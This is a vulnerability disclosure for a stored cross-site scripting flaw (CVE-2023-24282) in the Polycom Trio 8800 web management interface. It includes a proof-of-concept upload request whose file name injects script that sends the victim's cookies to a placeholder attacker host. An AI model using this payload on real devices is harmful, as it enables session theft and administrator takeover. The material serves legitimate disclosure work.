Stored Cross Site Scripting (CVE-2023-24282):
POST /form-submit/Preferences/Ringtone/upload HTTP/1.1
Host: 10.26.222.125
Cookie: session=00000003-JL7azBc2p7bexJaAKqvCYVCG15HubMz
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/109.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------109391813519434785531297386274
Content-Length: 24321
Origin: https://10.26.222.125
Referer: https://10.26.222.125/index.htm
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: iframe
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Te: trailers
Connection: close
-----------------------------109391813519434785531297386274
Content-Disposition: form-data; name="383:2"; filename="'><img src=1 onerror=this.src='http:\x2F\x2FAttacker-IP\x2F?c='+document.cookie>.wav"
Content-Type: audio/x-wav
RIFF WAVEfmt
…SNIP…
Vulnerability Type:
Cross Site Scripting(XSS)
Vendor of Product:
Polycom
Affected Product Code Base:
Trio 8800 - 7.2.2.1094
Affected Component:
Web Management Interface
Description:
The Web Management Interface of Polycom Trio 8800 was discovered to
contain a stored cross site scripting vulnerability. This vulnerability allows
injection of arbitrary javascript and administrator takeover.
Attack Vectors:
Remote authenticated attacker can inject malicious javascript code by sending a specially crafted request to Polycom Trio’s ringtone management endpoint.
Attack Type:
Remote
Impact Code execution:
false
Impact Escalation of Privileges:
true
Impact Information Disclosure:
true
19/01/23 - initial contact disclosure